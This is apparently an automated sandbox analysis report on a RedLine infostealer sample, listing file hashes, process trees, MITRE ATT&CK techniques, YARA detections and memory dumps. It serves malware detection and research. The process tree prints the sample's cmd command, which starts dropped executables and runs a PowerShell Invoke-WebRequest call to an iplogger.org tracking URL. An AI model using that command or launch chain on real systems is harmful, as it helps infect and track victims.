redline | 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f

Analysis

max time kernel
151s
max time network
155s
platform
windows7_x64
resource
win7v20201028
submitted
21-03-2021 10:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f5366963764901262499c8021333f986.exe
Size

1.1MB
MD5

f5366963764901262499c8021333f986
SHA1

e57b794220e7a6184614ccd4a6ddcf99de7e0717
SHA256

38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f
SHA512

84cde9fd4846e839fee7171546c76253c321af4bc619e2b0b4830077b9d966251e36217f60c6da6c31258770fbf71284a1896a7bc5b388c609ebf18be9c048d6

Score

10^/10

redline discovery infostealer spyware stealer

Malware Config

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1584-69-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral1/memory/1584-70-0x0000000000421DFE-mapping.dmp	family_redline
behavioral1/memory/1584-73-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 1604 powershell.exe
9 1604 powershell.exe
Executes dropped EXE 5 IoCs

Processes:

hello_C# (2).exehello_C#.exejayson.exeriv.exejayson.exe

pid process

1144 hello_C# (2).exe
1752 hello_C#.exe
1720 jayson.exe
1472 riv.exe
1584 jayson.exe
Loads dropped DLL 7 IoCs

Processes:

f5366963764901262499c8021333f986.execmd.exejayson.exe

pid process

1096 f5366963764901262499c8021333f986.exe
1928 cmd.exe
1928 cmd.exe
1928 cmd.exe
1928 cmd.exe
1928 cmd.exe
1720 jayson.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

jayson.exe

description pid process target process

PID 1720 set thread context of 1584 1720 jayson.exe jayson.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1604 powershell.exe
1604 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exejayson.exe

description pid process

Token: SeDebugPrivilege 1604 powershell.exe
Token: SeDebugPrivilege 1584 jayson.exe

flow	pid	process
7	1604	powershell.exe
9	1604	powershell.exe

pid	process
1144	hello_C# (2).exe
1752	hello_C#.exe
1720	jayson.exe
1472	riv.exe
1584	jayson.exe

pid	process
1096	f5366963764901262499c8021333f986.exe
1928	cmd.exe
1928	cmd.exe
1928	cmd.exe
1928	cmd.exe
1928	cmd.exe
1720	jayson.exe

description	pid	process	target process
PID 1720 set thread context of 1584	1720	jayson.exe	jayson.exe

pid	process
1604	powershell.exe
1604	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	1584	jayson.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

f5366963764901262499c8021333f986.execmd.exejayson.exe

description	pid	process	target process
PID 1096 wrote to memory of 1928	1096	f5366963764901262499c8021333f986.exe	cmd.exe
PID 1096 wrote to memory of 1928	1096	f5366963764901262499c8021333f986.exe	cmd.exe
PID 1096 wrote to memory of 1928	1096	f5366963764901262499c8021333f986.exe	cmd.exe
PID 1096 wrote to memory of 1928	1096	f5366963764901262499c8021333f986.exe	cmd.exe
PID 1928 wrote to memory of 1144	1928	cmd.exe	hello_C# (2).exe
PID 1928 wrote to memory of 1144	1928	cmd.exe	hello_C# (2).exe
PID 1928 wrote to memory of 1144	1928	cmd.exe	hello_C# (2).exe
PID 1928 wrote to memory of 1144	1928	cmd.exe	hello_C# (2).exe
PID 1928 wrote to memory of 1752	1928	cmd.exe	hello_C#.exe
PID 1928 wrote to memory of 1752	1928	cmd.exe	hello_C#.exe
PID 1928 wrote to memory of 1752	1928	cmd.exe	hello_C#.exe
PID 1928 wrote to memory of 1752	1928	cmd.exe	hello_C#.exe
PID 1928 wrote to memory of 1720	1928	cmd.exe	jayson.exe
PID 1928 wrote to memory of 1720	1928	cmd.exe	jayson.exe
PID 1928 wrote to memory of 1720	1928	cmd.exe	jayson.exe
PID 1928 wrote to memory of 1720	1928	cmd.exe	jayson.exe
PID 1928 wrote to memory of 1472	1928	cmd.exe	riv.exe
PID 1928 wrote to memory of 1472	1928	cmd.exe	riv.exe
PID 1928 wrote to memory of 1472	1928	cmd.exe	riv.exe
PID 1928 wrote to memory of 1472	1928	cmd.exe	riv.exe
PID 1928 wrote to memory of 1604	1928	cmd.exe	powershell.exe
PID 1928 wrote to memory of 1604	1928	cmd.exe	powershell.exe
PID 1928 wrote to memory of 1604	1928	cmd.exe	powershell.exe
PID 1928 wrote to memory of 1604	1928	cmd.exe	powershell.exe
PID 1720 wrote to memory of 1584	1720	jayson.exe	jayson.exe
PID 1720 wrote to memory of 1584	1720	jayson.exe	jayson.exe
PID 1720 wrote to memory of 1584	1720	jayson.exe	jayson.exe
PID 1720 wrote to memory of 1584	1720	jayson.exe	jayson.exe
PID 1720 wrote to memory of 1584	1720	jayson.exe	jayson.exe
PID 1720 wrote to memory of 1584	1720	jayson.exe	jayson.exe
PID 1720 wrote to memory of 1584	1720	jayson.exe	jayson.exe
PID 1720 wrote to memory of 1584	1720	jayson.exe	jayson.exe
PID 1720 wrote to memory of 1584	1720	jayson.exe	jayson.exe

C:\Users\Admin\AppData\Local\Temp\f5366963764901262499c8021333f986.exe
"C:\Users\Admin\AppData\Local\Temp\f5366963764901262499c8021333f986.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & start "" "jayson.exe" & start "" "riv.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1928

C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe
"hello_C# (2).exe"
3⤵
- Executes dropped EXE
PID:1144

C:\Users\Admin\AppData\Local\Temp\hello_C#.exe
"hello_C#.exe"
3⤵
- Executes dropped EXE
PID:1752

C:\Users\Admin\AppData\Local\Temp\jayson.exe
"jayson.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1720

C:\Users\Admin\AppData\Local\Temp\jayson.exe
"{path}"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Users\Admin\AppData\Local\Temp\riv.exe
"riv.exe"
3⤵
- Executes dropped EXE
PID:1472

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe

MD5
d6b9f530e7e8ddebea8069a0d94ad38e

SHA1
28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

SHA256
3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

SHA512
2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

Download Submit
C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe

MD5
d6b9f530e7e8ddebea8069a0d94ad38e

SHA1
28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

SHA256
3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

SHA512
2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

Download Submit
C:\Users\Admin\AppData\Local\Temp\hello_C#.exe

MD5
d6b9f530e7e8ddebea8069a0d94ad38e

SHA1
28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

SHA256
3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

SHA512
2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

Download Submit
C:\Users\Admin\AppData\Local\Temp\hello_C#.exe

MD5
d6b9f530e7e8ddebea8069a0d94ad38e

SHA1
28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

SHA256
3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

SHA512
2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

Download Submit
C:\Users\Admin\AppData\Local\Temp\jayson.exe

MD5
68f70e9545a6dbeecd3e2eba38c197ca

SHA1
5d0fdc7452e3af1c4d7b145256888687e5fd2a72

SHA256
a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

SHA512
99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\jayson.exe

MD5
68f70e9545a6dbeecd3e2eba38c197ca

SHA1
5d0fdc7452e3af1c4d7b145256888687e5fd2a72

SHA256
a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

SHA512
99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\jayson.exe

MD5
68f70e9545a6dbeecd3e2eba38c197ca

SHA1
5d0fdc7452e3af1c4d7b145256888687e5fd2a72

SHA256
a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

SHA512
99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\riv.exe

MD5
bd96d90751fd507c3af0edbe0d596ec4

SHA1
eed0bb7626d328190c7de701c0071f9c4ad048ef

SHA256
f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db

SHA512
5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338

Download Submit
C:\Users\Admin\AppData\Local\Temp\riv.exe

MD5
bd96d90751fd507c3af0edbe0d596ec4

SHA1
eed0bb7626d328190c7de701c0071f9c4ad048ef

SHA256
f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db

SHA512
5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338

Download Submit
\Users\Admin\AppData\Local\Temp\hello_C# (2).exe

MD5
d6b9f530e7e8ddebea8069a0d94ad38e

SHA1
28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

SHA256
3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

SHA512
2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

Download Submit
\Users\Admin\AppData\Local\Temp\hello_C#.exe

MD5
d6b9f530e7e8ddebea8069a0d94ad38e

SHA1
28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

SHA256
3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

SHA512
2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

Download Submit
\Users\Admin\AppData\Local\Temp\jayson.exe

MD5
68f70e9545a6dbeecd3e2eba38c197ca

SHA1
5d0fdc7452e3af1c4d7b145256888687e5fd2a72

SHA256
a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

SHA512
99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

Download Submit
\Users\Admin\AppData\Local\Temp\jayson.exe

MD5
68f70e9545a6dbeecd3e2eba38c197ca

SHA1
5d0fdc7452e3af1c4d7b145256888687e5fd2a72

SHA256
a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

SHA512
99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

Download Submit
\Users\Admin\AppData\Local\Temp\nss4F0B.tmp\YPUD2.dll

MD5
293165db1e46070410b4209519e67494

SHA1
777b96a4f74b6c34d43a4e7c7e656757d1c97f01

SHA256
49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

SHA512
97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

Download Submit
\Users\Admin\AppData\Local\Temp\riv.exe

MD5
bd96d90751fd507c3af0edbe0d596ec4

SHA1
eed0bb7626d328190c7de701c0071f9c4ad048ef

SHA256
f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db

SHA512
5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338

Download Submit
\Users\Admin\AppData\Local\Temp\riv.exe

MD5
bd96d90751fd507c3af0edbe0d596ec4

SHA1
eed0bb7626d328190c7de701c0071f9c4ad048ef

SHA256
f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db

SHA512
5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338

Download Submit
memory/768-36-0x000007FEF6740000-0x000007FEF69BA000-memory.dmp

Filesize
2.5MB

Download
memory/1096-2-0x00000000761F1000-0x00000000761F3000-memory.dmp

Filesize
8KB

Download
memory/1144-27-0x0000000000E80000-0x0000000000E81000-memory.dmp

Filesize
4KB

Download
memory/1144-15-0x000007FEF5B60000-0x000007FEF654C000-memory.dmp

Filesize
9.9MB

Download
memory/1144-6-0x0000000000000000-mapping.dmp

Download
memory/1472-21-0x0000000000000000-mapping.dmp

Download
memory/1472-31-0x00000000022C0000-0x00000000022D1000-memory.dmp

Filesize
68KB

Download
memory/1472-32-0x00000000002A0000-0x00000000002D8000-memory.dmp

Filesize
224KB

Download
memory/1472-33-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/1584-69-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/1584-70-0x0000000000421DFE-mapping.dmp

Download
memory/1584-72-0x00000000745F0000-0x0000000074CDE000-memory.dmp

Filesize
6.9MB

Download
memory/1584-73-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/1584-75-0x0000000004820000-0x0000000004821000-memory.dmp

Filesize
4KB

Download
memory/1604-35-0x00000000745F0000-0x0000000074CDE000-memory.dmp

Filesize
6.9MB

Download
memory/1604-65-0x0000000007770000-0x0000000007771000-memory.dmp

Filesize
4KB

Download
memory/1604-39-0x00000000009A0000-0x00000000009A1000-memory.dmp

Filesize
4KB

Download
memory/1604-41-0x0000000004910000-0x0000000004911000-memory.dmp

Filesize
4KB

Download
memory/1604-40-0x0000000004950000-0x0000000004951000-memory.dmp

Filesize
4KB

Download
memory/1604-42-0x0000000004912000-0x0000000004913000-memory.dmp

Filesize
4KB

Download
memory/1604-24-0x0000000000000000-mapping.dmp

Download
memory/1604-64-0x0000000006340000-0x0000000006341000-memory.dmp

Filesize
4KB

Download
memory/1604-45-0x0000000002680000-0x0000000002681000-memory.dmp

Filesize
4KB

Download
memory/1604-46-0x0000000005360000-0x0000000005361000-memory.dmp

Filesize
4KB

Download
memory/1604-49-0x00000000056E0000-0x00000000056E1000-memory.dmp

Filesize
4KB

Download
memory/1604-54-0x0000000006130000-0x0000000006131000-memory.dmp

Filesize
4KB

Download
memory/1604-55-0x0000000006180000-0x0000000006181000-memory.dmp

Filesize
4KB

Download
memory/1604-62-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1604-63-0x0000000006320000-0x0000000006321000-memory.dmp

Filesize
4KB

Download
memory/1720-44-0x00000000005E0000-0x00000000005E5000-memory.dmp

Filesize
20KB

Download
memory/1720-37-0x0000000000AE0000-0x0000000000AE1000-memory.dmp

Filesize
4KB

Download
memory/1720-66-0x0000000005D40000-0x0000000005DD6000-memory.dmp

Filesize
600KB

Download
memory/1720-67-0x0000000005BC0000-0x0000000005C1E000-memory.dmp

Filesize
376KB

Download
memory/1720-29-0x00000000745F0000-0x0000000074CDE000-memory.dmp

Filesize
6.9MB

Download
memory/1720-43-0x0000000004DA0000-0x0000000004DA1000-memory.dmp

Filesize
4KB

Download
memory/1720-13-0x0000000000000000-mapping.dmp

Download
memory/1752-25-0x0000000001330000-0x0000000001331000-memory.dmp

Filesize
4KB

Download
memory/1752-17-0x000007FEF5B60000-0x000007FEF654C000-memory.dmp

Filesize
9.9MB

Download
memory/1752-9-0x0000000000000000-mapping.dmp

Download
memory/1928-4-0x0000000000000000-mapping.dmp

Download